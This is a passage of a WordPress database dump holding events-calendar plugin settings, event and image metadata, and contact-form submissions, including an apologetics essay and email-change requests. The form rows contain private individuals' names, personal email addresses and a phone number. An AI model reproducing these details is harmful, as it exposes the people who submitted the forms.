j\";s:5:\"limit\";s:0:\"\";s:18:\"include_local_time\";s:1:\"0\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:10:\"pagination\";s:8:\"loadmore\";s:13:\"month_divider\";s:1:\"0\";s:14:\"booking_button\";s:1:\"0\";s:11:\"custom_data\";s:1:\"0\";s:10:\"sed_method\";s:1:\"0\";s:11:\"image_popup\";s:1:\"0\";s:16:\"wrapper_bg_color\";s:0:\"\";}s:13:\"full_calendar\";a:34:{s:5:\"style\";s:7:\"classic\";s:15:\"start_date_type\";s:5:\"today\";s:10:\"start_date\";s:0:\"\";s:12:\"default_view\";s:4:\"list\";s:13:\"monthly_style\";s:5:\"clean\";s:5:\"limit\";s:0:\"\";s:4:\"list\";s:1:\"1\";s:16:\"date_format_list\";s:3:\"d M\";s:18:\"end_date_type_list\";s:4:\"date\";s:23:\"maximum_date_range_list\";s:0:\"\";s:17:\"order_method_list\";s:3:\"ASC\";s:4:\"grid\";s:1:\"0\";s:18:\"end_date_type_grid\";s:4:\"date\";s:23:\"maximum_date_range_grid\";s:0:\"\";s:17:\"order_method_grid\";s:3:\"ASC\";s:4:\"tile\";s:1:\"0\";s:6:\"yearly\";s:1:\"0\";s:20:\"date_format_yearly_1\";s:1:\"l\";s:20:\"date_format_yearly_2\";s:3:\"F j\";s:7:\"monthly\";s:1:\"1\";s:19:\"activate_first_date\";s:1:\"0\";s:20:\"activate_current_day\";s:1:\"1\";s:11:\"display_all\";s:1:\"0\";s:6:\"weekly\";s:1:\"1\";s:5:\"daily\";s:1:\"1\";s:13:\"display_price\";s:1:\"0\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:18:\"include_local_time\";s:1:\"0\";s:14:\"booking_button\";s:1:\"0\";s:11:\"custom_data\";s:1:\"0\";s:10:\"sed_method\";s:1:\"0\";s:11:\"image_popup\";s:1:\"0\";s:16:\"wrapper_bg_color\";s:0:\"\";}s:11:\"yearly_view\";a:16:{s:5:\"style\";s:6:\"modern\";s:15:\"start_date_type\";s:18:\"start_current_year\";s:10:\"start_date\";s:0:\"\";s:19:\"modern_date_format1\";s:1:\"l\";s:19:\"modern_date_format2\";s:3:\"F j\";s:5:\"limit\";s:0:\"\";s:6:\"months\";a:12:{i:1;s:1:\"1\";i:2;s:1:\"1\";i:3;s:1:\"1\";i:4;s:1:\"1\";i:5;s:1:\"1\";i:6;s:1:\"1\";i:7;s:1:\"1\";i:8;s:1:\"1\";i:9;s:1:\"1\";i:10;s:1:\"1\";i:11;s:1:\"1\";i:12;s:1:\"1\";}s:18:\"include_local_time\";s:1:\"0\";s:20:\"next_previous_button\";s:1:\"1\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:14:\"booking_button\";s:1:\"0\";s:11:\"custom_data\";s:1:\"0\";s:10:\"sed_method\";s:1:\"0\";s:11:\"image_popup\";s:1:\"0\";s:16:\"wrapper_bg_color\";s:0:\"\";}s:12:\"monthly_view\";a:18:{s:5:\"style\";s:7:\"classic\";s:15:\"start_date_type\";s:19:\"start_current_month\";s:10:\"start_date\";s:0:\"\";s:5:\"limit\";s:0:\"\";s:18:\"include_local_time\";s:1:\"0\";s:20:\"next_previous_button\";s:1:\"1\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:17:\"display_organizer\";s:1:\"0\";s:19:\"activate_first_date\";s:1:\"0\";s:20:\"activate_current_day\";s:1:\"1\";s:11:\"display_all\";s:1:\"0\";s:14:\"booking_button\";s:1:\"0\";s:11:\"custom_data\";s:1:\"0\";s:13:\"detailed_time\";s:1:\"0\";s:10:\"sed_method\";s:1:\"0\";s:11:\"image_popup\";s:1:\"0\";s:16:\"wrapper_bg_color\";s:0:\"\";}s:3:\"map\";a:8:{s:5:\"style\";s:7:\"classic\";s:20:\"next_previous_button\";s:1:\"1\";s:19:\"liquid_date_format1\";s:3:\"F d\";s:15:\"start_date_type\";s:5:\"today\";s:10:\"start_date\";s:0:\"\";s:5:\"limit\";s:3:\"200\";s:11:\"geolocation\";s:1:\"0\";s:17:\"geolocation_focus\";s:1:\"0\";}s:10:\"daily_view\";a:17:{s:5:\"style\";s:7:\"classic\";s:15:\"start_date_type\";s:5:\"today\";s:10:\"start_date\";s:0:\"\";s:5:\"limit\";s:0:\"\";s:18:\"include_local_time\";s:1:\"0\";s:20:\"next_previous_button\";s:1:\"1\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:18:\"display_categories\";s:1:\"0\";s:17:\"display_organizer\";s:1:\"0\";s:14:\"booking_button\";s:1:\"0\";s:11:\"custom_data\";s:1:\"0\";s:13:\"detailed_time\";s:1:\"0\";s:10:\"sed_method\";s:1:\"0\";s:11:\"image_popup\";s:1:\"0\";s:16:\"wrapper_bg_color\";s:0:\"\";s:17:\"display_thumbnail\";s:1:\"1\";}s:11:\"weekly_view\";a:16:{s:5:\"style\";s:7:\"classic\";s:15:\"start_date_type\";s:18:\"start_current_week\";s:10:\"start_date\";s:0:\"\";s:5:\"limit\";s:0:\"\";s:18:\"include_local_time\";s:1:\"0\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:18:\"display_categories\";s:1:\"0\";s:17:\"display_organizer\";s:1:\"0\";s:20:\"next_previous_button\";s:1:\"1\";s:14:\"booking_button\";s:1:\"0\";s:11:\"custom_data\";s:1:\"0\";s:13:\"detailed_time\";s:1:\"0\";s:10:\"sed_method\";s:1:\"0\";s:11:\"image_popup\";s:1:\"0\";s:16:\"wrapper_bg_color\";s:0:\"\";}s:9:\"timetable\";a:18:{s:5:\"style\";s:6:\"modern\";s:15:\"start_date_type\";s:18:\"start_current_week\";s:10:\"start_date\";s:0:\"\";s:5:\"limit\";s:0:\"\";s:21:\"number_of_days_modern\";s:1:\"7\";s:14:\"number_of_days\";s:1:\"5\";s:10:\"week_start\";s:2:\"-1\";s:10:\"start_time\";s:1:\"1\";s:8:\"end_time\";s:2:\"13\";s:18:\"include_local_time\";s:1:\"0\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:20:\"next_previous_button\";s:1:\"1\";s:14:\"booking_button\";s:1:\"0\";s:11:\"custom_data\";s:1:\"0\";s:10:\"sed_method\";s:1:\"0\";s:11:\"image_popup\";s:1:\"0\";s:16:\"wrapper_bg_color\";s:0:\"\";}s:7:\"masonry\";a:23:{s:5:\"style\";s:7:\"classic\";s:15:\"start_date_type\";s:5:\"today\";s:10:\"start_date\";s:0:\"\";s:13:\"end_date_type\";s:4:\"date\";s:18:\"maximum_date_range\";s:0:\"\";s:12:\"order_method\";s:3:\"ASC\";s:12:\"date_format1\";s:1:\"j\";s:12:\"date_format2\";s:1:\"F\";s:5:\"limit\";s:0:\"\";s:9:\"filter_by\";s:0:\"\";s:18:\"include_local_time\";s:1:\"0\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:18:\"display_categories\";s:1:\"0\";s:17:\"display_organizer\";s:1:\"0\";s:10:\"fit_to_row\";s:1:\"0\";s:17:\"masonry_like_grid\";s:1:\"0\";s:10:\"pagination\";s:1:\"0\";s:14:\"booking_button\";s:1:\"0\";s:11:\"custom_data\";s:1:\"0\";s:10:\"sed_method\";s:1:\"0\";s:11:\"image_popup\";s:1:\"0\";s:16:\"wrapper_bg_color\";s:0:\"\";}s:5:\"cover\";a:12:{s:5:\"style\";s:7:\"classic\";s:18:\"date_format_clean1\";s:1:\"d\";s:18:\"date_format_clean2\";s:1:\"M\";s:18:\"date_format_clean3\";s:1:\"Y\";s:20:\"date_format_classic1\";s:3:\"F d\";s:20:\"date_format_classic2\";s:1:\"l\";s:19:\"date_format_modern1\";s:8:\"l, F d Y\";s:8:\"event_id\";s:6:\"265563\";s:18:\"include_local_time\";s:1:\"0\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:16:\"wrapper_bg_color\";s:0:\"\";}s:9:\"countdown\";a:12:{s:5:\"style\";s:6:\"style1\";s:19:\"date_format_style11\";s:5:\"j F Y\";s:19:\"date_format_style21\";s:5:\"j F Y\";s:19:\"date_format_style31\";s:1:\"j\";s:19:\"date_format_style32\";s:1:\"F\";s:19:\"date_format_style33\";s:1:\"Y\";s:8:\"event_id\";s:2:\"-1\";s:8:\"bg_color\";s:7:\"#437df9\";s:18:\"include_local_time\";s:1:\"0\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:16:\"wrapper_bg_color\";s:0:\"\";}s:14:\"available_spot\";a:10:{s:5:\"style\";s:7:\"classic\";s:19:\"fluent_date_format1\";s:3:\"F d\";s:19:\"liquid_date_format1\";s:3:\"F d\";s:12:\"date_format1\";s:1:\"j\";s:12:\"date_format2\";s:1:\"F\";s:8:\"event_id\";s:2:\"-1\";s:18:\"include_local_time\";s:1:\"0\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:16:\"wrapper_bg_color\";s:0:\"\";}s:8:\"carousel\";a:28:{s:5:\"style\";s:6:\"fluent\";s:15:\"start_date_type\";s:5:\"today\";s:10:\"start_date\";s:0:\"\";s:18:\"type1_date_format1\";s:1:\"d\";s:18:\"type1_date_format2\";s:1:\"F\";s:18:\"type1_date_format3\";s:1:\"Y\";s:18:\"type2_date_format1\";s:6:\"M d, Y\";s:18:\"type3_date_format1\";s:6:\"M d, Y\";s:5:\"count\";s:1:\"3\";s:12:\"count_tablet\";s:1:\"2\";s:12:\"count_mobile\";s:1:\"1\";s:5:\"limit\";s:0:\"\";s:15:\"autoplay_status\";s:1:\"1\";s:8:\"autoplay\";s:4:\"7000\";s:11:\"loop_status\";s:1:\"1\";s:14:\"booking_button\";s:1:\"0\";s:11:\"custom_data\";s:1:\"1\";s:12:\"archive_link\";s:0:\"\";s:9:\"head_text\";s:0:\"\";s:18:\"include_local_time\";s:1:\"1\";s:20:\"include_events_times\";s:1:\"1\";s:13:\"display_label\";s:1:\"1\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:10:\"sed_method\";s:1:\"0\";s:11:\"image_popup\";s:1:\"0\";s:10:\"navigation\";s:1:\"1\";s:15:\"dots_navigation\";s:1:\"0\";s:16:\"wrapper_bg_color\";s:0:\"\";}s:6:\"slider\";a:28:{s:5:\"style\";s:2:\"t1\";s:15:\"start_date_type\";s:5:\"today\";s:10:\"start_date\";s:0:\"\";s:18:\"type1_date_format1\";s:1:\"d\";s:18:\"type1_date_format2\";s:1:\"F\";s:18:\"type1_date_format3\";s:1:\"l\";s:18:\"type2_date_format1\";s:1:\"d\";s:18:\"type2_date_format2\";s:1:\"F\";s:18:\"type2_date_format3\";s:1:\"l\";s:18:\"type3_date_format1\";s:1:\"d\";s:18:\"type3_date_format2\";s:1:\"F\";s:18:\"type3_date_format3\";s:1:\"l\";s:18:\"type4_date_format1\";s:1:\"d\";s:18:\"type4_date_format2\";s:1:\"F\";s:18:\"type4_date_format3\";s:1:\"l\";s:18:\"type5_date_format1\";s:1:\"d\";s:18:\"type5_date_format2\";s:1:\"F\";s:18:\"type5_date_format3\";s:1:\"l\";s:5:\"limit\";s:0:\"\";s:8:\"autoplay\";s:0:\"\";s:15:\"transition_time\";s:3:\"250\";s:18:\"include_local_time\";s:1:\"0\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:11:\"custom_data\";s:1:\"0\";s:13:\"display_price\";s:1:\"0\";s:25:\"display_available_tickets\";s:1:\"0\";s:16:\"wrapper_bg_color\";s:0:\"\";}s:8:\"timeline\";a:18:{s:15:\"start_date_type\";s:5:\"today\";s:10:\"start_date\";s:0:\"\";s:13:\"end_date_type\";s:4:\"date\";s:18:\"maximum_date_range\";s:0:\"\";s:12:\"order_method\";s:3:\"ASC\";s:20:\"classic_date_format1\";s:5:\"d F Y\";s:5:\"limit\";s:0:\"\";s:18:\"include_local_time\";s:1:\"0\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:18:\"display_categories\";s:1:\"0\";s:17:\"display_organizer\";s:1:\"0\";s:10:\"pagination\";s:8:\"loadmore\";s:13:\"month_divider\";s:1:\"0\";s:14:\"booking_button\";s:1:\"0\";s:11:\"custom_data\";s:1:\"0\";s:10:\"sed_method\";s:1:\"0\";s:11:\"image_popup\";s:1:\"0\";}s:4:\"tile\";a:17:{s:5:\"style\";s:7:\"classic\";s:15:\"start_date_type\";s:19:\"start_current_month\";s:10:\"start_date\";s:0:\"\";s:18:\"clean_date_format1\";s:1:\"j\";s:18:\"clean_date_format2\";s:1:\"M\";s:5:\"count\";s:1:\"4\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:18:\"display_categories\";s:1:\"0\";s:17:\"display_organizer\";s:1:\"0\";s:20:\"next_previous_button\";s:1:\"1\";s:5:\"limit\";s:0:\"\";s:10:\"pagination\";s:8:\"loadmore\";s:14:\"booking_button\";s:1:\"0\";s:11:\"custom_data\";s:1:\"0\";s:10:\"sed_method\";s:1:\"0\";s:11:\"image_popup\";s:1:\"0\";}s:16:\"general_calendar\";a:8:{s:15:\"start_date_type\";s:19:\"start_current_month\";s:10:\"start_date\";s:0:\"\";s:10:\"more_event\";s:0:\"\";s:18:\"include_local_time\";s:1:\"0\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:10:\"sed_method\";s:1:\"0\";s:11:\"image_popup\";s:1:\"0\";}s:14:\"thumbnail_size\";a:2:{s:5:\"width\";s:3:\"350\";s:6:\"height\";s:3:\"196\";}}'),(146320,265565,'show_only_one_occurrence','0'),(146321,265565,'show_past_events','0'),(146322,265565,'show_only_past_events','0'),(146323,265565,'show_ongoing_events','0'),(146324,265565,'show_only_ongoing_events','0'),(146325,265565,'protect_children',''),(146326,265565,'boldgrid_hide_page_title','0'),(146337,265571,'_field_450','Lexi'),(146338,265571,'_field_451','Massey'),(146339,265571,'_field_458','9704028258'),(146340,265571,'_field_452','AlexaReevesMassey@gmail.com'),(146341,265571,'_field_453','Hello'),(146342,265571,'_field_454','Hi there, \n\nI was raised in Eckankar and left for a number of year and came back last year. I just want to get more connected. I live in Loveland. I\'ve done some Eck zooms but a lot of them haven\'t been local. It would be fun to get more connected to local Eckists. \nI\'m also wondering if there is a lending library? There\'s some old books I\'d like to re read, and also a lot of books written recently that I hadn\'t read, and I would really love to borrow books. I\'ve looked at all the local libraries and there\'s only 2 Eck books available in all the libraries in Loveland and Fort Collins. Thanks! '),(146343,265571,'_form_id','49'),(146344,265571,'_seq_num','2'),(146353,265576,'_edit_lock','1631474228:2'),(146354,265576,'_edit_last','2'),(146355,265576,'_wp_page_template','default'),(146356,265576,'protect_children',''),(146357,265576,'passster_activate_global_protection',NULL),(146358,265576,'passster_activate_protection',NULL),(146359,265576,'passster_protection_type','password'),(146360,265576,'boldgrid_hide_page_title','0'),(146361,265576,'boldgrid_in_page_containers','1'),(146362,265576,'bgseo_robots_index','index'),(146363,265576,'bgseo_robots_follow','follow'),(146364,265578,'_field_133','Rex'),(146365,265578,'_field_134','Vestula'),(146366,265578,'_field_135','rx.vestula@globaltec.net'),(146367,265578,'_field_137','THE RELIABILITY OF SCRIPTURE'),(146368,265578,'_field_138','THE RELIABILITY OF SCRIPTURE\n\nDoes good archaeological support exist for the Bible?\n\nYes! Unlike other books that claim to be Scripture (such as the Book of Mormon), the Bible’s accuracy and reliability have been proved and verified over and over again by archeological finds produced by both believing and non-believing scholars and scientists.  This includes verification for numerous customs, places, names, and events mentioned in the Bible.\n\nOne among many examples is the fact that for many years the existence of the Hittites (a powerful people who lived during the time of Abraham) was questioned because no archeological digs had uncovered anything about them.  Critics claimed the Hittites were pure myth.  But today the critics are silenced.  Abundant archeological evidence for the existence of the Hittites during the time of Abraham has been uncovered.\n\nBible scholar Donald J. Wiseman notes, “The geography of  Bible lands and visible remains of antiquity were gradually recorded until today more than 25,000 sites within this region and dating to Old Testament times, in their broadest sense, have been located.” [Donald J. Wiseman, “Archaeological Confirmation of the Old Testament,” cited in Norman L. Geisler,\nChristian Apologetics (Grand Rapids: Baker Book House, 1976), p. 322.]  Nelson Glueck, a \nspecialist in ancient literature did an exhaustive study and concluded: “It can be stated categorically that no archaeological discovery has ever controverted a biblical reference.”\n[Nelson Glueck, Rivers in the Desert (Philadelphia: Jewish Publications Society of America, 1969), p. 31.]  Well-known scholar William F. Albright, following a comprehensive study, wrote: “Discovery after discovery has established the accuracy of innumerable details, and has brought increased recognition of the value of the Bible as a source of history.” [William F. Albright; cited in Josh McDowell, Evidence That Demands a Verdict (San Bernardino, CA: Campus Crusade for Christ, 1972), p. 68.]\n\nDoes strong manuscript evidence exist for the New Testament?  What about all the “variants” the critics talk about?\n\nThere are more than 24,000 partial and complete manuscript copies of the New Testament.  These manuscript copies are very ancient and they are available for inspection now.  There are also some 86,000 quotations from the early church fathers and several thousand lectionaries (church service books containing Scripture quotations used in the early centuries of Christianity).  In fact, there are enough quotations from the early church fathers that even if we did not have a single copy of the Bible, scholars could still reconstruct all but 11 verses of the entire New Testament from material written within 150 to 200 years from the time of Christ.  Bottom line: the New Testament has an overwhelming amount of evidence supporting its reliability.\n\nNow, in the many thousands of manuscript copies we possess of the New Testament, scholars have discovered that there are some 200,000 “variants.”  This may seem like a staggering \nfigure to the uniformed mind.  But to those who study the issue, the numbers are not as serious as it may initially appear.  Indeed, a look at the hard evidence shows that the New Testament manuscripts are amazingly accurate and trustworthy.\n\nTo begin, we must emphasize that out of these 200,000 variants, 99 percent hold virtually no significance whatsoever.  Many of these variants simply involve a missing letter in a word; some involve reversing the order of two words (such as “Christ Jesus” instead of “Jesus Christ”); some may involve the absence of one or more insignificant words.  Really, when all the facts are put on the table, only about 40 of the variants have any real significance and even then, no doctrine of the Christian faith or any moral commandment is affected by them.  For more that 99 percent of the cases the original text can be reconstructed to a practical certainty.\n\nBy practicing the science of textual criticism, comparing all the available manuscripts with each other, we can come to an assurance regarding what the original document must have said.  Perhaps an illustration might be helpful.  Let us suppose we have five manuscript copies of an original document that no longer exists.  Each of the manuscript copies are different. Our goal is to compare the manuscript copies and ascertain what the original must have said.  Here are the five copies:\n\n	Manuscript #1: Jesus Christ is the Savior of the whole world.\n\n	Manuscript #2: Christ Jesus is the Savior of the whole world.\n\n	Manuscript #3: Jesus Christ s the Savior of the whole worl.\n\n	Manuscript #4:	 Jesus Christ is th Savior of  the whle world.\n\n	Manuscript #5: Jesus Christ is the Savor of the whole wrld.\n\nCould you, by comparing the manuscript copies, ascertain what the original document said with a high degree of certainty that you are correct?  Of course you could.  This illustration may be extremely simplistic, but a great majority of the 200,000 variants are solved by the above methodology.  By comparing the various manuscripts, all of which contain very minor differences like the illustration, it becomes fairly clear what the original must have said.\n\nDoes good manuscript support exist for the Old Testament?\n\nYes!  The Dead Sea Scrolls prove the accuracy of the transmission of the Old Testament books of the Bible.  In fact, in these scrolls discovered at Qumran in 1947, we have Old Testament manuscripts that date about a thousand years earlier (150 B.C.) than the other Old Testament manuscripts previously in our possession (which dated to A.D. 980).  The significant thing is that when one compares the two sets of manuscripts, it is clear that they are essentially the same, with very few changes.  The fact that manuscripts separated by a thousand years are essentially the same indicates the incredible accuracy of the Old Testament’s manuscript transmission.\n\nThe copy of the Book of Isaiah discovered at Qumran illustrates this accuracy.  Dr. Gleason Archer, who personally examined both the A.D. 980 and 150 B.C.  copies of Isaiah, comments:\n\n	Even though the two copies of Isaiah discovered in Qumran Cave 1 near the Dead Sea in\n	1947 were a thousand years earlier than the oldest dated manuscript previously known\n	(A.D. 980), they proved to be word for word identical with our standard Hebrew Bible\n	in more than 95 percent of the text.  The 5 percent of variation consisted chiefly of \n	obvious slips of the pen and variations in spelling. [Gleason Archer, A Survey of\n	Old Testament Introduction (Chicago: Moody Press, 1964), p. 19]\n\n\nThe Dead Sea Scrolls prove that the copyists of biblical manuscripts took great care in going about their work.  These copyists knew they were duplicating God’s Word.  Hence they went to incredible lengths to insure that no error crept into their work.  The scribes carefully counted every line, word, syllable, and letter to guarantee accuracy. [Dan Story, Defending Your Faith: How to Answer the Tough Questions (Nashville, TN: Thomas Nelson Publishers, 1992), p. 35.]\n\nDoes any biblical basis exist for the idea that God preserves Scripture through the ages?\n\nYes! The God who had the power and sovereign control to inspire the Scriptures in the first place is surely going to continue to exercise His power and sovereign control in the preservation of Scripture.\n\nActually, God’s preservational work is illustrated in the text of the Bible.  By examining how Christ viewed the Old Testament (keeping in mind that Jesus did not have in His possession the original books penned by the Old Testament writers, but possessed only copies), we see that He had full confidence that the Scriptures He used had been faithfully preserved through the centuries.\n\n	Because Christ raised no doubts about the adequacy of the Scriptures as His contemporaries\n	knew them, we can safely assume that the first-century text of the Old Testament was a \n	wholly adequate representation of the divine word originally given.  Jesus regarded the extant\n	copies of His day as so approximate to the originals in their message that He appealed to \n	those copies as authoritative. [Greg L. Bahnsen, “The Inerrancy of the Autographa,”\n	cited in Norman L. Geisler, ed., Inerrancy (Grand Rapids: Zondervan Publishing\n	House, 1980), p. 161.]\n\nThe respect that Jesus and His apostles held for the extant Old Testament text is an expression of their confidence that God providentially preserved these copies and translations so that they were substantially identical with the inspired originals.\n\n'),(146369,265578,'_form_id','13'),(146370,265578,'_seq_num','80'),(146371,265581,'_field_133','Beatrix'),(146372,265581,'_field_134','Babcock'),(146373,265581,'_field_135','Beatrix_babcock@comcast.net'),(146374,265581,'_field_137','change email addresses'),(146375,265581,'_field_138','Please change my email address as my old one was hacked. The old one was trixib@comcast.net  please change it to Beatrix_babcock@comcast.net.  All other contact information remains the same.'),(146376,265581,'_form_id','13'),(146377,265581,'_seq_num','81'),(146378,265582,'_field_133','Jerry'),(146379,265582,'_field_134','Babcock'),(146380,265582,'_field_135','jleehon@comcast.net'),(146381,265582,'_field_137','Change email address'),(146382,265582,'_field_138','Please change my email address to jleehon@comcast.net'),(146383,265582,'_form_id','13'),(146384,265582,'_seq_num','82'),(146385,265587,'mec_moved_online_link',''),(146386,265587,'mec_cancelled_reason',''),(146387,265587,'mec_display_cancellation_reason_in_single_page',''),(146388,265587,'boldgrid_hide_page_title','0'),(146389,265587,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(146390,265587,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2021-11-20\";s:4:\"hour\";s:1:\"1\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2021-11-20\";s:4:\"hour\";s:1:\"2\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(146391,265587,'mec_currency','a:0:{}'),(146392,265587,'mec_additional_organizer_ids','a:0:{}'),(146393,265587,'mec_additional_location_ids','a:0:{}'),(146394,265587,'mec_cost',''),(146395,265587,'mec_more_info_target','_self'),(146396,265587,'mec_more_info_title',''),(146397,265587,'mec_organizer_id','1'),(146398,265587,'mec_read_more',''),(146399,265587,'mec_more_info',''),(146400,265587,'mec_repeat_type',''),(146401,265587,'mec_repeat_status','0'),(146402,265587,'mec_end_day_seconds','50400'),(146403,265587,'mec_end_time_ampm','PM'),(146404,265587,'mec_end_time_minutes','0'),(146405,265587,'mec_end_time_hour','2'),(146406,265587,'mec_end_date','2021-11-20'),(146407,265587,'mec_start_day_seconds','46800'),(146408,265587,'mec_start_time_ampm','PM'),(146409,265587,'mec_start_time_minutes','0'),(146410,265587,'mec_public','1'),(146411,265587,'mec_start_date','2021-11-20'),(146412,265587,'mec_start_time_hour','1'),(146413,265587,'mec_countdown_method','global'),(146414,265587,'mec_timezone','global'),(146415,265587,'mec_comment',''),(146416,265587,'one_occurrence','0'),(146417,265587,'mec_hide_time','0'),(146418,265587,'mec_hide_end_time','0'),(146419,265587,'mec_event_status','EventScheduled'),(146420,265587,'mec_fields','a:0:{}'),(146421,265587,'mec_op','a:0:{}'),(146422,265587,'mec_bfixed_fields','a:0:{}'),(146423,265587,'mec_reg_fields','a:0:{}'),(146424,265587,'mec_reg_fields_global_inheritance','1'),(146425,265587,'mec_ticket_variations','a:0:{}'),(146426,265587,'mec_ticket_variations_global_inheritance','1'),(146427,265587,'mec_fees','a:0:{}'),(146428,265587,'mec_booking','a:0:{}'),(146429,265587,'mec_tickets','a:0:{}'),(146430,265587,'mec_fees_global_inheritance','1'),(146431,265587,'mec_hourly_schedules','a:0:{}'),(146432,265587,'mec_not_in_days',''),(146433,265587,'mec_in_days',''),(146434,265587,'mec_repeat_end_at_date',''),(146435,265587,'mec_advanced_days','a:0:{}'),(146436,265587,'passster_protection_type','password'),(146437,265587,'passster_activate_global_protection',NULL),(146438,265587,'passster_activate_protection',NULL),(146439,265587,'mec_notifications','a:5:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:20:\"booking_confirmation\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"Your booking is confirmed.\";s:7:\"content\";s:243:\"<p>Hi %%name%%,</p>\r\n<p>Your booking is confirmed. You should be available at %%book_date%% in %%event_location_address%%.</p>\r\n<p>You can contact to event organizer by calling %%event_organizer_tel%%.</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:14:\"event_finished\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(146440,265587,'mec_repeat_end_at_occurrences',''),(146441,265587,'mec_repeat_end',''),(146442,265587,'mec_repeat_interval','1'),(146443,265587,'mec_allday','0'),(146444,265587,'mec_certain_weekdays','a:0:{}'),(146445,265587,'mec_dont_show_map','0'),(146446,265587,'mec_location_id','118'),(146447,265587,'mec_color',''),(146448,265587,'protect_children',''),(146449,265587,'_edit_lock','1631661133:2'),(146450,265587,'_edit_last','2'),(146451,265587,'_thumbnail_id','265588'),(146452,265588,'_wp_attached_file','2021/09/heart-in-hand-2.jpg'),(146453,265588,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:483;s:6:\"height\";i:276;s:4:\"file\";s:27:\"2021/09/heart-in-hand-2.jpg\";s:5:\"sizes\";a:7:{s:6:\"medium\";a:4:{s:4:\"file\";s:27:\"heart-in-hand-2-300x171.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:171;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:27:\"heart-in-hand-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumblist\";a:4:{s:4:\"file\";s:27:\"heart-in-hand-2-300x276.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:276;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"meccarouselthumb\";a:4:{s:4:\"file\";s:27:\"heart-in-hand-2-474x276.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:276;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"gridsquare\";a:4:{s:4:\"file\";s:27:\"heart-in-hand-2-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"tileview\";a:4:{s:4:\"file\";s:27:\"heart-in-hand-2-300x276.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:276;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:27:\"heart-in-hand-2-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(146454,265557,'original-file','2021/09/past-lives-dreams-st-2-updraft-pre-smush-original.jpg'),(146455,265557,'